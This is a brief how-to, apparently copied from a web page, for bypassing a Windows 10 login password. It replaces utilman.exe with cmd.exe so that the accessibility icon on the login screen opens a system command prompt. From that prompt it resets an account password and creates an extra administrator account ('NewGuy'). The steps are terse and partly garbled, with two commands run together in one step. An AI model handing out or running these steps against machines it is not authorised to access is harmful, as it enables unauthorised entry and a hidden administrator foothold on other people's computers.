Remove Windows 10 Login Password without Software

Shortcut using CMD
Step 1

C:\

Step 2

cd windows\system32 ren utilman.exe utilman.exe.bak

Step 3

copy cmd.exe utilman.exe

Step 4 Turn off and restart and disability icon

net user (account name) (password)

ignore below
NewGuy abc123 /add
net localgroup Administrators NewGuy /add
Source HERE